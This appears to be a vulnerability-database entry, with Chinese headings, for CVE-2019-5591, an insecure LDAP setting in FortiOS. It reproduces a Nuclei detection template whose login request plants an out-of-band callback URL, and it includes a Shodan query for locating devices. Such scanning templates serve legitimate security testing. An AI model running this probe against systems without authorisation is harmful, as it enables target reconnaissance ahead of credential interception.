CVE-2019-5591: FortiOS - Insecure LDAP Configuration Detection

日期: 2026-01-08 | 影响软件: FortiOS | POC: 已公开

漏洞描述

The FortiGate LDAP configuration was detected to be insecure due to missing ca-cert, secure LDAPS, or server-identity-check, potentially exposing LDAP communications to credential interception or man-in-the-middle attacks under specific network conditions.

PoC代码[已公开]

id: CVE-2019-5591

info:
  name: FortiOS - Insecure LDAP Configuration Detection
  author: ayewo
  severity: medium
  description: |
    The FortiGate LDAP configuration was detected to be insecure due to missing ca-cert, secure LDAPS, or server-identity-check, potentially exposing LDAP communications to credential interception or man-in-the-middle attacks under specific network conditions.
  impact: |
    Unauthenticated attackers can intercept sensitive information by impersonating LDAP servers within the same subnet.
  remediation: |
    Configure LDAP server settings properly and disable default configurations; update to the latest firmware version.
  reference:
    - https://github.com/ayewo/fortios-ldap-mitm-poc-CVE-2019-5591
    - https://www.fortiguard.com/psirt/FG-IR-19-037
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2019-5591
    epss-score: 0.49178
    epss-percentile: 0.9767
    cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: fortinet
    product: fortigate
    shodan-query: 'cpe:"cpe:2.3:o:fortinet:fortios"'
    tags: cve,cve2019,fortinet,ldap,kev,vkev,oast

variables:
  username: "{{rand_text_alpha(10)}}"
  password: "{{rand_text_alphanumeric(12)}}"

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /logincheck HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain;charset=UTF-8

        ajax=1&username={{username}}&secretkey={{interactsh-url}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'name="username"'
          - 'name="secretkey"'
        condition: and

      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - contains(body_2, "0")
          - contains(body_2, "1")
          - contains(body_2, "2")
        condition: or

      - type: word
        part: body_2
        words:
          - "ajax=1&username="
        condition: or
        negative: true

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
# digest: 4a0a0047304502204c923ca46c268ae26f01497c4c45cbdc0cecfe786b127b870d562c4c98aa4a47022100cd44784ad47ce8b2db3c428e43f9f8a57c531cf72ae514e209d4e05d9f469ece:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2019/CVE-2019-5591.yaml

相关漏洞推荐